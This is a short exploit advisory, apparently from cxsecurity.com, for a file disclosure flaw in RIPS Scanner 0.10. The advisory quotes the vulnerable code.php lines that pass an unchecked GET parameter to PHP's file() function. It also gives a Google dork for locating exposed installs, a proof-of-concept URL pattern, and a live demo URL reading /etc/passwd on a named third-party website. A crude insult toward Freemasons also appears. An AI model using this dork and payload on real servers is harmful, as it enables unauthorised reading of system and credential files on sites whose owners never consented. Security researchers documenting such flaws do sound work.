RIPS Scanner 0.10 File Disclosure

2012.06.10
Credit: L3b-r1'z
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: allintitle: \"RIPS - A static source code analyser for

# --------------------------------------- # Author : L3b-r1'z Title : Rips-Scanner File Disclosure Date\Time : 8/6/2012 Email : L3br1z@Gmail.com Site : Sec4Ever.com & Exploit4arab.com Google Dork : allintitle: "RIPS - A static source code analyser for vulnerabilities in PHP scripts" Version : 0.10 # --------------------------------------- # This PoC was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. # --------------------------------------- # 1) Bug 2) PoC # --------------------------------------- # 2) Bug : In File code.php folder /windows/ In Line 102 To 108 $file = $_GET['file']; $marklines = explode(',', $_GET['lines']); if(!empty($file)) { $lines = file($file); We Have variable File _GET['file'] And We Have Function file($file); File Function Is Like Show Source :D # --------------------------------------- # 3) PoC : http://domain.tld/windows/code.php?file=the correct path to file Demo On WTF Im L33t :P : http://www.wtfiml33t.com/windows/code.php?file=/etc/passwd NOTE : Fuck All FREEMASONES Another NOTE : FUCK ALL SCANNER TOOLS :@ # --------------------------------------- # Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector , Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID. # --------------------------------------- #


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top